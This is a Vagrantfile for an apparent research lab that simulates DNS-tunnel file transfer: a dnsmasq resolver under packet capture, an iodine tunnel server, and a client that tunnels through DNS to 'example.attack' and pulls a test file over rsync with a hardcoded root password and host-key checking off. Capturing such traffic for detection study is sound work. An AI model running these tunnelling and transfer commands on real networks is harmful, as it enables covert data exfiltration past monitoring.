dns_tunnel_file_transfer/4af8dcc310fba2b8745e5818968a84b4/Vagrantfile

# -*- mode: ruby -*-
# vi: set ft=ruby :

Vagrant.configure("2") do |config|


config.vm.define "dnsmasq" do |dnsmasq|

    # Set the box-type and version (default is latest)
    dnsmasq.vm.box = "ubuntu/focal64"
    dnsmasq.vm.box_version = ">= 0"
    
    # Set the hostname
    dnsmasq.vm.hostname = "dnsmasq"

    # Setup networking
    dnsmasq.vm.network "private_network", ip: "192.168.0.10", virtualbox__intnet: "intnet"
    

    # Provision VM
    dnsmasq.vm.provision "shell", path: 'dnsmasq.bash', privileged: true
    
    dnsmasq.vm.provision "ansible_local" do |a|
        a.install = true,
        a.install_mode = "default",
        a.playbook = "filebeat_playbook_dnsmasq",
        a.become_user = "root",
        a.become = true
    end
    # Runtime triggers
    dnsmasq.trigger.after [:up, :reload] do |trigger|
        trigger.info = "Begin TCPDUMP capture."
        trigger.run_remote = { inline: 'rm -f nohup.out; nohup tcpdump -i any -n -t -w /tmp/dns.pcap port 53 & sleep 1; echo $! > /var/run/tcpdump.pid', privileged: true }
    end
    dnsmasq.trigger.after [:up, :reload] do |trigger|
        trigger.info = "Executing 'run'-section of the scenario component."
        trigger.run_remote = { inline: 'systemctl stop systemd-resolved; systemctl restart dnsmasq;', privileged: true }
    end

    # Data collection
    
    dnsmasq.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Stopping TCPDUMP"
        trigger.run_remote = { inline: 'if [ -f /var/run/tcpdump.pid ]; then kill $(cat /var/run/tcpdump.pid); rm -f /var/run/tcpdump.pid; fi', privileged: true }
    end
    dnsmasq.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Changing permissions on the remote artifact: /var/log/dnsmasq.log"
        trigger.run_remote = { inline: 'chmod o+r /var/log/dnsmasq.log', privileged: true }
    end
    dnsmasq.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Grabbing artifact from Guest machine: /var/log/dnsmasq.log"
        trigger.run = { inline: 'vagrant scp dnsmasq:/var/log/dnsmasq.log dnsmasq/' }
    end
    dnsmasq.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Removing artifact from Guest machine: /var/log/dnsmasq.log"
        trigger.run_remote = { inline: 'rm -rf /var/log/dnsmasq.log', privileged: true }
    end
    dnsmasq.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Changing permissions on the remote artifact: /tmp/dns.pcap"
        trigger.run_remote = { inline: 'chmod o+r /tmp/dns.pcap', privileged: true }
    end
    dnsmasq.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Grabbing artifact from Guest machine: /tmp/dns.pcap"
        trigger.run = { inline: 'vagrant scp dnsmasq:/tmp/dns.pcap dnsmasq/' }
    end
    dnsmasq.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Removing artifact from Guest machine: /tmp/dns.pcap"
        trigger.run_remote = { inline: 'rm -rf /tmp/dns.pcap', privileged: true }
    end
    dnsmasq.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Changing permissions on the remote artifact: /tmp/filebeat.json*"
        trigger.run_remote = { inline: 'chmod o+r /tmp/filebeat.json*', privileged: true }
    end
    dnsmasq.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Grabbing artifact from Guest machine: /tmp/filebeat.json*"
        trigger.run = { inline: 'vagrant scp dnsmasq:/tmp/filebeat.json* dnsmasq/' }
    end
    dnsmasq.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Removing artifact from Guest machine: /tmp/filebeat.json*"
        trigger.run_remote = { inline: 'rm -rf /tmp/filebeat.json*', privileged: true }
    end
    end
config.vm.define "iodineserver" do |iodineserver|

    # Set the box-type and version (default is latest)
    iodineserver.vm.box = "ubuntu/focal64"
    iodineserver.vm.box_version = ">= 0"
    
    # Set the hostname
    iodineserver.vm.hostname = "iodineserver"

    # Setup networking
    iodineserver.vm.network "private_network", ip: "192.168.0.20", virtualbox__intnet: "intnet"
    

    # Provision VM
    iodineserver.vm.provision "ansible_local" do |a|
        a.install = true,
        a.install_mode = "default",
        a.playbook = 'iodine_server_setup',
        a.become_user = "root",
        a.become = true
    end
    
    # Runtime triggers
    iodineserver.trigger.after [:up, :reload] do |trigger|
        trigger.info = "Executing 'run'-section of the scenario component."
        trigger.run_remote = { inline: 'nohup asciinema rec /tmp/iodine_server_private_base32_0xDEADBEEF.cast -c \'set -x; iodined -4 -c -f 10.0.0.1 example.attack -P 0xDEADBEEF & sleep 1\'', privileged: true }
    end

    # Data collection
    iodineserver.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Changing permissions on the remote artifact: /tmp/*.cast"
        trigger.run_remote = { inline: 'chmod o+r /tmp/*.cast', privileged: true }
    end
    iodineserver.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Grabbing artifact from Guest machine: /tmp/*.cast"
        trigger.run = { inline: 'vagrant scp iodineserver:/tmp/*.cast iodineserver/' }
    end
    iodineserver.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Removing artifact from Guest machine: /tmp/*.cast"
        trigger.run_remote = { inline: 'rm -rf /tmp/*.cast', privileged: true }
    end
    end
config.vm.define "iodineclient" do |iodineclient|

    # Set the box-type and version (default is latest)
    iodineclient.vm.box = "ubuntu/focal64"
    iodineclient.vm.box_version = ">= 0"
    
    # Set the hostname
    iodineclient.vm.hostname = "iodineclient"

    # Setup networking
    iodineclient.vm.network "private_network", ip: "192.168.0.30", virtualbox__intnet: "intnet"
    

    # Provision VM
    iodineclient.vm.provision "shell", path: 'iodine_client_setup.bash', privileged: true
    
    # Runtime triggers
    iodineclient.trigger.after [:up, :reload] do |trigger|
        trigger.info = "Executing 'run'-section of the scenario component."
        trigger.run_remote = { inline: 'asciinema rec /tmp/iodine_client_private_base32_0xDEADBEEF.cast -c \'set -x; (iodine -4 -f -P 0xDEADBEEF -Tprivate -Obase32 -r 192.168.0.10 example.attack) & sleep 20; rsync -P --rsh="sshpass -p root ssh -l root -oStrictHostKeyChecking=no" 10.0.0.1:/root/test-file /tmp/\'', privileged: true }
    end

    # Data collection
    iodineclient.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Changing permissions on the remote artifact: /tmp/*.cast"
        trigger.run_remote = { inline: 'chmod o+r /tmp/*.cast', privileged: true }
    end
    iodineclient.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Grabbing artifact from Guest machine: /tmp/*.cast"
        trigger.run = { inline: 'vagrant scp iodineclient:/tmp/*.cast iodineclient/' }
    end
    iodineclient.trigger.before [:destroy, :halt, :reload] do |trigger|
        trigger.info = "Removing artifact from Guest machine: /tmp/*.cast"
        trigger.run_remote = { inline: 'rm -rf /tmp/*.cast', privileged: true }
    end
    end
end